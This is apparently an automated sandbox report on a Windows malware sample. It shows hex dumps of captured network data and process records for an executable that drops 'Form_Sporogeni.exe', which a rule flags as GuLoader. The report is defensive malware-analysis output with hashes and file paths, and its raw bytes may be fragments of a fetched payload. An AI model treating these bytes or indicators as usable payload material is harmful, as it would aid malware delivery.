                  2021-12-02 06:09:37 UTC64INData Raw: cd 60 ac 2b 13 f4 3a 56 83 e8 1d f6 8b f0 d1 15 df 95 ff 21 9d d0 29 08 96 97 80 2f 00 6a 78 85 44 a8 e2 5c 8e 73 5e e9 c6 b6 f7 6e 5f f4 1d 0a ae 27 a0 20 32 b9 cd d8 3a 10 f8 4c 7f 29 2a 38 b5 22 a8 47 c3 7c 12 df dd 9e 1b 7b bd 8f 95 a9 c8 2c b5 0e 37 c0 7f 88 68 f4 7f e5 f8 a5 df 71 e1 38 bc 91 c5 89 37 ac 87 7c 98 2e 07 41 59 dd ae 9e 55 a7 db 4a ff 65 d3 e6 e1 77 07 ee 83 6e 85 ce 8e 63 a0 2b 90 94 44 98 50 41 cc 4c 06 cb 06 4a c5 05 28 38 89 85 82 75 aa c1 91 4d b6 3f 2b af 93 68 2d 2f 10 e7 14 e2 f8 6b 94 63 b0 bc 8c a7 33 f6 bb 48 32 72 77 7a 3c 74 cf 1b 8e 6b 97 c8 ea ae ca a7 a0 ed 36 e6 8c 99 e4 0b e1 84 3f 5d b0 72 8a b2 47 63 79 da ad f3 d5 a0 a2 41 35 02 77 b5 e5 69 bc a9 25 b0 9a 2a dd 91 c1 c4 1e d5 1b 67 a7 fe b2 8c dd 33 b1 97 cd 36 7f
                  Data Ascii: `+:V!)/jxD\s^n_' 2:L)*8"G|{,7hq87|.AYUJewnc+DPALJ(8uM?+h-/kc3H2rwz<tk6?]rGcyA5wi%*g36
                  2021-12-02 06:09:37 UTC65INData Raw: 40 34 84 b8 47 15 3c b9 54 70 8a f1 b0 35 61 b1 c6 dc 0e 2f 85 d9 b4 df cc ed b1 c5 5b a7 cc 7a da 69 21 fa 9e 14 f5 93 86 82 be c1 c2 33 29 01 c1 a2 24 49 06 36 4d a3 b2 38 3a 07 79 f8 e0 7c 40 7a c9 8a 04 03 ce 8f 23 22 22 80 2c 60 76 c8 95 12 b7 90 99 8f 8f 42 c5 d5 3f 38 5b a6 f8 be a1 e2 20 4b eb 69 65 16 10 0e 01 aa 32 f1 33 96 75 8e 51 fd 48 3c de 99 82 63 ed 51 88 de ec 6c da d1 a4 1c d5 bf 12 19 6e 79 3e 39 60 c1 b8 71 76 b7 62 82 64 b1 74 75 d9 d0 fa 97 55 7e 79 27 de a6 52 c5 1b 75 4a 5d f5 99 ae a4 89 db ad 0e 68 a3 3e 3d 22 c3 94 4d bf 57 a0 79 a9 73 ab b4 17 69 48 9e ec e8 d9 38 b5 07 ae b4 7b d7 a5 46 60 0d b5 41 e2 26 b6 b9 75 5f 36 6c 28 ff 4c c6 5f ef 62 8e 5a 7c 2b de 54 5f a9 9e e9 b7 57 99 69 60 b0 40 43 14 d5 5a b6 a6 d6 9a 44 d0 4c
                  Data Ascii: @4G<Tp5a/[zi!3)$I6M8:y|@z#"",`vB?8[ Kie23uQH<cQlny>9`qvbdtuU~y'RuJ]h>="MWysiH8{F`A&u_6l(L_bZ|+T_Wi`@CZDL
                  2021-12-02 06:09:37 UTC66INData Raw: 24 b4 8d c6 4e 24 89 58 84 a6 22 b5 33 ee 4e 74 5e 04 52 13 db c9 cd f4 d1 55 c1 dd be 74 df d5 4b 34 69 59 9b 6f 30 be e1 07 6b 32 ff dd bc 92 38 7c 3d 61 4f 64 70 2a 04 ff 6d 01 c7 b5 43 21 c7 28 9a 74 76 d4 e5 46 4a 14 ec 12 a2 60 8f 61 90 53 67 4c a2 cb 9d 95 1d ad 54 3d ea 01 c5 f5 df 02 6c a0 d8 68 45 f2 b0 10 57 54 e3 bf 74 83 4b 26 14 a8 56 85 d9 9d 93 96 35 a6 9d 22 a3 9a d1 10 26 fa 80 9f 87 77 17 6b d2 15 85 da ea ad 41 06 c7 c1 5f 3a 82 05 bc c4 93 7c b5 de a3 82 85 c3 70 09 f8 c6 a8 6f 03 a9 97 f2 02 53 16 83 07 48 03 d2 8f 23 22 1a 70 cc 76 4f 53 4e b5 a6 40 db ca 6c 39 69 22 73 1c 40 29 ba 9f ac e3 20 fc ef 69 65 a1 52 23 08 ab 32 06 33 9e d5 6d 13 d4 4d 3d de be c2 a4 a9 b2 ca eb ed 6d da 66 17 98 f1 78 50 28 93 79 3e 26 60 06 fc 92 34 8a
                  Data Ascii: $N$X"3Nt^RUtK4iYo0k28|=aOdp*mC!(tvFJ`aSgLT=lhEWTtK&V5"&wkA_:|poSH#"pvOSN@l9i"s@) ieR#23mM=mfxP(y>&`4
                  2021-12-02 06:09:37 UTC67INData Raw: cd 4c 2f 8c 48 ac 17 47 eb bc 05 21 ba 5f b2 32 73 ae 10 cc c6 cd 7b 62 c0 02 50 e5 61 05 b4 d2 40 70 4d e1 b3 cb ad 1e 59 4e 8a f3 d5 03 cf a2 1a 70 8b 20 b2 86 a9 27 c5 16 a5 6b 46 c6 50 b3 4a b4 62 ba 56 82 44 b3 e4 db 1b 2b b9 0f 8b 1d 76 d3 de b7 03 96 80 7e a4 bb fc dd 3f 7e dd d8 dd e6 3a 6d 0f 51 9f a9 c7 72 c6 fa e9 d4 a6 e6 aa 49 b9 b5 9e 1a a8 5e af 3b 96 88 10 ea 64 7e c3 ce b4 78 2c 14 71 96 44 98 0f 70 ff f2 42 fe 5a 62 af 0b 55 2a 61 87 fe 8a 55 bd 0c 82 b0 5c 0a 16 80 d7 2c 90 56 26 e8 1d 73 36 4c ff b0 bc bf f1 35 1e d7 24 4e 8d 2b 2b 94 d5 d7 bf 0c 54 3d 33 db 24 47 fb 63 b8 3d 87 4a b5 9c 4e 51 cc 6c 5b 81 5c 5a 28 60 e8 0d e8 a5 9c df 5e 97 49 9e 1d 88 8a a6 d3 6f 22 97 8d 13 10 4c 91 29 17 f7 6f 1c b5 35 25 56 1c 62 bf 64 51 20 ea 7d
                  Data Ascii: L/HG!_2s{bPa@pMYNp 'kFPJbVD+v~?~:mQrI^;d~x,qDpBZbU*aU\,V&s6L5$N++T=3$Gc=JNQl[\Z(`^Io"L)o5%VbdQ }
                  2021-12-02 06:09:37 UTC68INData Raw: c5 ca 8c a5 06 7d df 56 14 27 8a f5 8f 35 61 ea 25 a5 8a 37 af 1a 8b 53 73 04 5c 8a e5 7b 15 0f d2 d9 1a 22 34 15 e2 5e 4e 8d c8 ed 7c 82 3e c6 31 d9 98 7a c6 68 5e ae d1 3e 32 3b d3 52 71 09 27 ce ea f7 e8 38 0f 50 9e ca 86 0a db 77 91 d1 92 64 ab 39 91 0c e4 97 7e e9 1b c7 f7 ea a5 99 98 11 5a d8 6d a1 e8 d1 95 a6 77 28 31 74 3c 73 c9 23 d4 02 5d 29 02 be 7d e0 29 9a 88 91 65 aa ae e4 c3 13 b4 8c ac d0 63 f3 c4 ea 9f 3e fd 4e fc b9 9b 4d cb 11 d7 ce 02 e8 f4 7e 50 d8 0d 3a 66 22 b9 cd 9d 7e 3f a6 1b 36 bb 18 42 5b a1 8f 61 67 84 c1 18 9a 5b f7 c6 12 1a e2 06 bf 04 df 63 51 46 aa 48 92 d9 08 d2 dc a3 8f 7d c7 3c e9 f5 86 a2 a1 21 c2 cc 92 db 48 8b b0 93 24 a7 c1 26 34 5c 21 4d 24 f7 65 8f 1b e8 56 9f b8 fe 9a c9 4e ef 78 39 ad a3 6e ca 67 2a b1 c2 14 08
                  Data Ascii: }V'5a%7Ss\{"4^N|>1zh^>2;Rq'8Pwd9~Zmw(1t<s#])})ec>NM~P:f"~?6B[ag[cQFH}<!H$&4\!M$eVNx9ng*
                  2021-12-02 06:09:37 UTC70INData Raw: 51 12 48 50 32 c8 59 61 7f e3 ca 72 b9 3f e4 b3 92 b8 fd 07 0d f9 19 57 2c 1a 1f 89 30 e6 e5 af 73 b9 cd d8 71 a7 17 73 2e 61 44 9b 75 aa b7 8d 62 ba 31 07 58 67 7e f6 35 80 5e 47 0a 8f b7 2b fd b0 36 0a 23 9a a0 62 29 8c 8d 57 b6 d7 c2 ba 6e a5 54 51 71 7c e6 a2 4e a2 a6 49 94 4a 9d 80 40 e2 b0 38 5b 3e e6 51 5a ef c5 79 c5 59 71 73 65 68 b6 31 3e 8b b5 68 16 43 56 8d 6d 0a eb 6b 6e aa d3 72 75 b7 0c ed e0 7e b3 c4 5f 2f 42 68 30 37 e1 ad a7 eb 2b 95 73 32 b7 1f fd 5e ff 83 40 76 f3 1f 6e 02 a0 51 65 6d a5 e3 9a 62 57 0d e1 ab f9 0a 8f 37 b4 ce e5 d2 7c c2 33 5c 0b c0 83 a3 9c b4 2b 71 fe 4a 3e 32 ac e5 6c fb c9 14 8d 7f ee 3d 78 45 d1 de a2 23 bb fc 07 d9 06 8c 52 de c5 87 26 54 48 67 a9 58 8b 88 e4 ec 43 db dd 97 e1 18 94 4b a5 60 24 ff 11 3a 32 65 24
                  Data Ascii: QHP2Yar?W,0sqs.aDub1Xg~5^G+6#b)WnTQq|NIJ@8[>QZyYqseh1>hCVmknru~_/Bh07+s2^@vnQembW7|3\+qJ>2l=xE#R&THgXCK`$:2e$
                  2021-12-02 06:09:37 UTC71INData Raw: f8 84 22 fd b5 9d 51 5d 99 67 be 7d 09 ed fc 0d 91 64 9b da ac 4b 64 b8 78 7f 0b d5 79 3e 5a a4 d9 e5 75 a6 84 73 17 9b 06 c8 55 01 5e 7f c3 9b c7 79 88 fc 2d 7c 02 61 c0 bf 5d 3f d9 02 a5 02 f4 57 8c 6a a3 42 f9 72 17 13 df b1 73 de 6a 02 04 9d ab f6 8b 95 38 62 49 4c 20 ca 3d ab 15 77 42 f4 e1 f5 ef af 23 c9 b8 59 1f ee 29 8c 57 34 b1 4b 67 53 72 27 29 cf 52 c6 13 35 22 4a cb 51 f6 f0 a3 55 03 33 c2 06 ac 42 f6 16 cd bd fc 85 62 67 80 37 1e d3 55 fd 65 bf 6c d7 5c 6b af 91 8a a3 75 b3 85 fd dc a4 fd ab 90 fb ae b9 24 a1 69 6e 6f 14 b4 05 dd 88 0e e1 2d 30 bb d1 2a d7 44 7d 30 13 01 69 f5 98 cf 7a ef 90 4c ee 99 82 df 50 17 dc 54 71 98 f0 af 25 fc c3 c5 b0 d5 6b ce cb d9 c6 c1 fe f8 12 04 00 f7 84 4e ea ce ad 0b 2c 14 91 67 a7 d8 1b 9d f8 2b 18 37 bb 40
                  Data Ascii: "Q]g}dKdxy>ZusU^y-|a]?WjBrsj8bIL =wB#Y)W4KgSr')R5"JQU3Bbg7Uel\ku$ino-0*D}0izLPTq%kN,g+7@
                  2021-12-02 06:09:37 UTC72INData Raw: 2e 5d d9 d4 72 14 0d 1e fc b1 75 c0 90 ff 8d ef b8 89 fe bf 4f 9e 3b de bc 8e 00 bc 08 09 6b 34 85 78 4e e2 f9 fc a8 0e df 47 09 68 3e 3b 32 37 ea 7e e5 21 c7 19 47 04 3d 94 3d 66 68 48 d0 fc 03 f5 cd b9 c1 c0 06 b3 2b aa c0 e1 08 4e a9 07 aa 05 c4 5d 13 3c f0 4d f8 38 6a 56 6b 02 c3 bb 7d 7c 1a b0 bc 81 b9 7c af 36 10 ac 2f 63 c9 e4 94 8e bd cc e5 a2 b0 83 23 3a a7 ae d6 a0 de 16 61 55 65 8c ad b0 c2 bb be 95 01 cd 10 41 5c 38 d4 c2 15 b0 e4 39 81 d0 f1 81 c1 98 b8 f9 d7 fd dc bc 10 5d 0b 8f db be 27 35 89 d5 f6 ab 05 27 3e 2e cb be 66 e4 dc fa 88 f7 c6 9b 57 b7 a7 41 83 d4 de 5c f4 7b d7 08 e9 51 1b 83 a0 55 d7 aa 66 16 c9 7a b7 56 84 a2 de 8a 75 12 63 ac 57 cc 67 c8 f3 d6 02 a1 db f3 dc 2f 3b ca d4 98 b3 33 93 7e 86 5c 3b 29 fe cd 17 bd be c2 77 60 d2
                  Data Ascii: .]ruO;k4xNGh>;27~!G==fhH+N]<M8jVk}||6/c#:aUeA\89]'5'>.fWA\{QUfzVucWg/;3~\;)w`
                  2021-12-02 06:09:37 UTC74INData Raw: af 6c d1 a9 db fe 25 68 f5 16 c3 bd 35 c8 8f 67 d3 24 9d dd d4 36 de 9a e0 ed a7 92 a1 20 3d 58 29 65 54 7d a4 80 37 2e ed 53 fd 4f bf 6c c7 6c 55 4c a1 26 70 5a 1b 85 fd 04 3a 64 dd 2a 55 7f 5e 0c 38 1f dc bf fb b0 26 ee 2e 9b e8 c2 34 88 fc 8d 42 56 92 04 2e 28 ce 60 9b 20 6e d0 b7 eb 7b 8c 6d c3 73 58 45 22 4a d5 f6 45 1f 13 07 1e 34 e4 75 dc 24 15 11 47 cf fb 22 08 e7 ec cb 6d ef d5 c4 11 c8 2f 9d 9d 81 56 18 9d f8 1b 44 09 58 79 c2 f5 3e f4 1f 7d f6 66 06 d5 e8 57 30 a3 3a d8 aa 3a 75 64 5c eb d3 5b e6 f5 95 98 62 ef 0d 9d 83 bc 2c ea 28 3f a2 fc cb e5 72 96 2b 04 e7 1f 2f 78 b0 bd cd ae 80 4b 46 46 f6 a9 c9 6a 8c 93 9b 2d cc 25 2b 76 86 52 5e ad b6 01 96 da ef e0 f6 a0 53 f0 09 b8 ba fb 7d 94 e0 6d 9a 7b 85 34 26 08 c7 14 50 30 f1 70 06 b0 7e 69 01
                  Data Ascii: l%h5g$6 =X)eT}7.SOllUL&pZ:d*U^8&.4BV.(` n{msXE"JE4u$G"m/VDXy>}fW0::ud\[b,(?r+/xKFFj-%+vR^S}m{4&P0p~i
                  2021-12-02 06:09:37 UTC75INData Raw: bb f8 85 98 67 71 fa 37 00 0d 98 8c 5a 8f c9 bb d6 64 bd b7 9b 54 80 3e b4 c4 12 20 f3 77 85 e4 ec 73 b1 5e 61 7b d1 7b fc e7 59 07 a5 ab 4c 0e 44 3a 98 f2 63 ad ed 03 69 46 0c 1d f5 60 f3 32 b3 5a 1f 3e 8e 82 2b 64 5c cf 3e 02 32 55 b8 09 b7 ee f1 75 a4 47 2a 5a cf e9 59 48 42 96 ac 6a e6 4d b8 bb 84 bc 69 3a 79 65 11 52 8d 90 63 25 31 0c f5 fe 4e ff 30 a5 cf e8 91 3f 49 3a 2a 72 7d c2 73 16 22 86 0f b6 69 dd 8e b7 d1 a7 9c 77 64 60 33 a9 85 ed 68 a6 51 4d 7e 87 23 53 e2 21 ed 53 0e 47 c7 b4 9f d8 77 28 ae 6d 4c a7 1a 23 5f 1c 91 e5 f8 1f 0d d5 f9 2b be ed 84 33 f1 0a c1 a2 f6 82 9f 31 88 07 4d f5 30 2c 14 6f f3 02 f5 40 4e 4a 71 7f 6e 60 68 dd 22 a2 cc ef ba 53 95 b4 b7 fa dc 10 de 9c cb 1e d7 61 02 9e 82 43 d7 ea ec fc 25 ae 04 c9 c2 f5 03 20 c1 5a 73
                  Data Ascii: gq7ZdT> ws^a{{YLD:ciF`2Z>+d\>2UuG*ZYHBjMi:yeRc%1N0?I:*r}s"iwd`3hQM~#S!SGw(mL#_+31M0,o@NJqn`h"SaC% Zs
                  2021-12-02 06:09:37 UTC76INData Raw: f0 44 ce 93 5e 84 7a d9 1f 10 6a 59 c5 2c 0a 75 ef 77 c3 09 ba a5 04 4a 88 08 63 97 c4 15 91 73 08 29 81 b7 d5 d0 54 84 19 bf e8 f6 08 67 b7 8b f0 a5 32 29 a9 dc 6d 07 21 fa 6d d3 04 68 ff fe fd c2 7a 31 07 e2 92 ae 73 5e e9 c6 b6 4a 98 d5 89 b6 8a 00 4c 1e df 83 55 6c 78 9b 10 c5 92 78 6c 24 0f 97 59 3d b8 b6 7d be 42 e8 33 bb 59 11 98 94 6f 6e 8a b3 3c 28 12 2a fd 60 a3 44 a2 b5 3f 8c ca b5 eb 64 ed a6 02 5c b4 9c 06 bc 30 54 43 59 87 af cd 42 c0 8e 19 a9 c9 eb 32 2f 0d 07 19 3b 2d 90 25 c5 4b 2c 41 b6 83 00 6c f1 e5 95 cc 2e 94 6b 89 ad 9e 20 61 da 3b 36 5a de e6 4d 55 97 f6 ad 2c 80 5d 6b 87 0d 03 40 b4 10 27 2a fd b0 c0 22 bc ef 88 4b 24 19 72 2b 07 df c2 ba 82 a0 fd 8c e3 7e 50 5d 25 64 f9 85 ab 99 09 e4 a2 0b bb e1 5d 3e a7 69 5a ef f4 86 30 ad 99
                  Data Ascii: D^zjY,uwJcs)Tg2)m!mhz1s^JLUlxxl$Y=}B3Yon<(*`D?d\0TCYB2/;-%K,Al.k a;6ZMU,]k@'*"K$r+~P]%d]>iZ0
                  2021-12-02 06:09:37 UTC77INData Raw: 13 9b cf 60 f0 59 ea c4 71 f7 69 34 62 fc 95 82 d2 f9 14 5d e6 8b 2a 26 07 62 0a 48 9e 22 b0 28 59 68 44 c5 7d f8 f0 6e a9 e7 92 55 14 a2 3c fc 2f 09 41 6d 67 4e 7f bf 8f 36 62 a6 78 4f 11 77 30 6f ba d5 6e c8 35 3e bd 77 a1 2d 9b 7d 67 6b b1 bb d8 a9 4d 7d 7a 9f 31 e4 e0 c6 22 98 ae 2c 9b 85 ed ac 16 92 01 71 97 c8 84 17 de 58 0a 50 8f e7 44 cb ed 11 36 45 ca 76 c8 13 f6 c1 c7 f7 32 95 88 5c e2 20 5a 9d 50 49 39 1c a6 03 aa 94 a6 25 24 59 12 5f b4 e8 01 25 41 d7 e8 01 17 e1 f6 10 93 25 ca c7 56 e5 87 68 26 4b 03 1a d6 e4 df b9 b6 f3 59 77 37 89 f9 fd ba 0d 9e 0a d3 2d 77 f2 63 fc 37 fe fb 8a 4a 48 2b 4f 41 a7 69 c2 69 3b 22 ac 4c c1 3d 39 a2 eb 8a c5 60 04 b5 96 be 27 fc 9c ae 9a ed d9 17 26 7c 1c d2 d6 8c 01 f8 0f d3 9f d6 1d 88 55 1f cc 3a 05 25 a1 1b
                  Data Ascii: `Yqi4b]*&bH"(YhD}nU</AmgN6bxOw0on5>w-}gkM}z1",qXPD6Ev2\ ZPI9%$Y_%A%Vh&KYw7-wc7JH+OAii;"L=9`'&|U:%
                  2021-12-02 06:09:37 UTC79INData Raw: 90 83 dd bc 94 d9 3f d0 30 43 62 6a f4 da e5 5c 63 d6 d1 0c 66 62 23 a1 c8 b6 17 d4 6f 1c 81 ae 29 5a 47 c3 22 4c 51 32 ea 4a eb b6 ac de 75 42 29 77 7b a9 5f 7f fd c6 b3 33 f4 f7 6e 8e e6 a4 5b 91 13 0f 3b 98 5b fd a6 ea 10 71 2a 81 34 c3 55 c1 9d 82 be 76 cf 2c 2a a3 97 f9 94 27 14 e2 f8 eb 5c 11 4f 43 0e 01 4c b7 c0 95 9b 8f 9d 72 9e b8 0f 99 77 bb 6c 6d 80 fc f4 f1 93 36 71 ee 15 a5 73 3a 10 c4 3f 0d bc cd 3a e6 d7 19 66 4c 52 66 d2 5f 97 49 47 d6 af a1 09 d3 7b 2c 3e 79 6d 2e 96 91 29 17 b9 af 0c 18 9c 25 84 4c 9d 6c 28 99 c4 97 43 fb f3 64 bd 18 a4 a0 a8 4e 88 32 96 be 83 a8 45 62 eb 92 ab 35 07 0d 31 22 65 1f 72 4c e6 1e a7 af 5c d9 98 49 b5 58 2d e9 ca 5b cc 8c 46 06 4b ab 58 d4 20 7d 8e 0e c6 e9 a1 cf c7 65 10 da c4 e7 f7 bc 4d 93 89 da 6a bb af
                  Data Ascii: ?0Cbj\cfb#o)ZG"LQ2JuB)w{_3n[;[q*4Uv,*'\OCLrwlm6qs:?:fLRf_IG{,>ym.)%Ll(CdN2Eb51"erL\IX-[FKX }eMj
                  2021-12-02 06:09:37 UTC80INData Raw: 58 45 da 77 4f d4 b1 ad ee 0e 99 fb 7e 38 69 ab 39 79 08 a6 f8 a2 a2 e2 20 49 96 65 41 16 10 1a 02 aa 32 c4 8c 57 99 8e 51 91 4b 3c de e2 74 23 ed 51 88 aa ef 6c da 2a dc d8 f1 bf 12 65 6d 79 3e c8 66 80 b8 71 76 c3 61 82 64 d9 09 71 fd d0 fa fb 56 7e 79 72 61 6d 16 c5 1b 61 49 5d f5 6c f2 ad 02 db ad 12 6b a3 3e 2a 87 0a d0 4d bf 43 a3 79 a9 47 cf bd 9c 69 48 b2 ef e8 d9 e2 65 17 e6 b4 7b e3 a6 46 60 e7 00 09 aa 26 b6 85 76 5f 36 4f 98 9b 24 c6 5f db 61 8e 5a ea 4c da 70 5f a9 b2 ea b7 57 96 d5 25 ba 40 43 00 d6 5a b6 4f 25 da 0c d0 4c 1e 40 94 90 66 62 5c d9 22 07 14 f3 d9 3b 6f 08 5f 93 24 f1 99 99 64 dd 99 35 b7 d3 ad 42 e4 dc 26 8d 41 a1 51 d1 a3 0b 43 46 01 fc 95 4b 70 1b 7e d3 db ce 60 02 20 07 ea 48 d3 01 fa 1b a9 f2 04 52 9d 2c 9b 2e d1 86 65 b5
                  Data Ascii: XEwO~8i9y IeA2WQK<t#Ql*emy>fqvadqV~yramaI]lk>*MCyGiHe{F`&v_6O$_aZLp_W%@CZO%L@fb\";o_$d5B&AQCFKp~` HR,.e
                  2021-12-02 06:09:37 UTC81INData Raw: b0 d0 72 92 b6 23 c7 70 ce 98 6d 0d ea 5e f0 f7 bd 5e 0f 37 a6 73 95 fc 85 c1 f2 29 e4 94 2e e8 c5 df 89 d8 65 ab 7b ff f5 46 0a 77 a2 c2 9b 54 59 fe 7a 6d 88 cd 14 e9 63 75 42 f4 c3 63 da 69 e9 b0 93 10 45 6e 50 c9 f8 8c b8 d7 18 8b 1c a6 4d 88 a7 d9 56 ce a9 82 e7 46 31 67 0a 09 86 d4 7f 60 8a 8a e5 92 0d 98 6f 0c 89 37 81 71 c3 37 46 2b cf 3b 72 7e 7c 3e 5e 58 fb 2c be db 85 ed 3a 2e 47 30 1f b4 ae a6 b1 d8 82 67 91 89 7c e7 7b db 3a 8f 84 79 07 4b 3b 60 43 13 7d 2b 5e 5c d4 d2 e4 6f 6d a1 dd f2 a4 0a ee 1a 0c bd 58 11 58 3a 59 4e 08 8c c6 4e 90 eb a6 b1 89 5a 58 cd f9 50 68 5e af 1c d4 34 61 65 f4 1b dd 74 1f 32 5b 75 64 4a 34 15 b9 13 ea f0 0c 6a e7 6a f8 e8 20 bd 19 01 05 a4 2a 4e c2 d6 51 4f 69 cf 05 17 86 51 88 b3 09 b6 9f 40 1b 61 88 f8 4a ff 66
                  Data Ascii: r#pm^^7s).e{FwTYzmcuBciEnPMVF1g`o7q7F+;r~|>^X,:.G0g|{:yK;`C}+^\omXX:YNNZXPh^4aet2[udJ4jj *NQOiQ@aJf


                  Code Manipulations

                  Statistics

                  Behavior


                  System Behavior

                  General

                  Start time:07:07:55
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\lzJWJgZhPc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\lzJWJgZhPc.exe"
                  Imagebase:0x400000
                  File size:191165 bytes
                  MD5 hash:46984F492D6314442D1A502D7AB460C4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:07:08:03
                  Start date:02/12/2021
                  Path:C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Imagebase:0x400000
                  File size:99196928 bytes
                  MD5 hash:3C6FB2D5CB7A8CCF575C378C5883EAC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low

                  General

                  Start time:07:08:53
                  Start date:02/12/2021
                  Path:C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
                  Imagebase:0x400000
                  File size:99196928 bytes
                  MD5 hash:3C6FB2D5CB7A8CCF575C378C5883EAC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.410653501.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Disassembly

                  Code Analysis
